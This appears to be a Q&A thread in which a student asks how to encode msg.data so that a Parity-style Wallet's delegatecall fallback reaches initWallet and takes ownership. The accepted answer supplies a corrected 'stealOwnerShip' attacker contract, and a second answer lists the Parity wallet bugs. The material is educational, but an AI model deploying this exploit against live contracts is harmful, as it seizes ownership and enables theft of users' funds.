# How do you call a fallback function that uses msg.data for parameters

Tags: solidity, bytes, delegatecall

I am trying to complete a homework assignment, so I am not doing something malicious. The goal is to learn the vulnerabilities of contracts. I want to call the fallback function of wallet to trigger the initWallet function of WalletLibrary. I am a little confused on how to pass parameters through msg.data.

Here is the code to the contract I am trying to exploit.

```
contract WalletLibrary {
   function initWallet(address[] _owners, uint _required, uint _daylimit) {
     pass
  }
}

contract Wallet {
   // gets called when no other function matches
  function() payable {
    if (msg.data.length > 0) {
      _walletLibrary.delegatecall(msg.data);
    }
  }
  ...
}
```

Here is what I have tried unsuccessfully. I believe I am calling the fallback function, but I believe the parameters for msg.data have not been set properly.

```
contract WalletAttacker {
   ...
  function stealOwnerShip() external {
        address[1] memory owners = [address(this)];
        uint _required = 1;
        uint _daylimit = 1000000000000000000;
        targetWallet.call(bytes4(keccak256("initWallet(address[], uint, uint)")), owners, _required, _daylimit);
    }
}
```

Comment: Looks like you are on the right track. Try it with `bytes4(keccak256("initWallet(address[],uint256,uint256)"))` (no spaces). Does that work?

Answer (score 1, accepted):

That is pretty close. To obtain the function selector you have to remove any white space `bytes4(keccak256("initWallet(address[],uint256,uint256)"))`

Using solc 0.5 you should use `abi.encodeWithSelector()`

```
contract WalletAttacker {
   ...
  function stealOwnerShip() external {
    address[1] memory owners = [address(this)];
    uint _required = 1;
    uint _daylimit = 1000000000000000000;
    targetWallet.call(
      abi.encodeWithSelector(
        bytes4(keccak256("initWallet(address[],uint256,uint256)")),
        owners,
        _required,
        _daylimit
      )
    );
  }
}
```

> Important: For computing the function selector, uint256 and int256 have to be used. You can not use `uint` or `int`. Read the [docs](https://docs.soliditylang.org/en/latest/abi-spec.html#types) to learn more about it. Also there are no whitespace allowed between the arguments.

Answer (score 0):

three important tip that you should follow:

1. use uint256 instead of uint (I have problem with uint)
2. delete any whitespace in "initWallet(address[],uint,uint)" when using encodeWithSelector or encodeWithSignature
3. do not use similar pragma like: pragma experimental ABIEncoderV2 when using encodeWithSelector or encodeWithSignature

In summery parity wallet has a 3 bug:

1. initWallet Bug (ownership for everyone)
2. FrozenEther
3. killable wallet (stole ownership and kill wallet by delegation of fallback)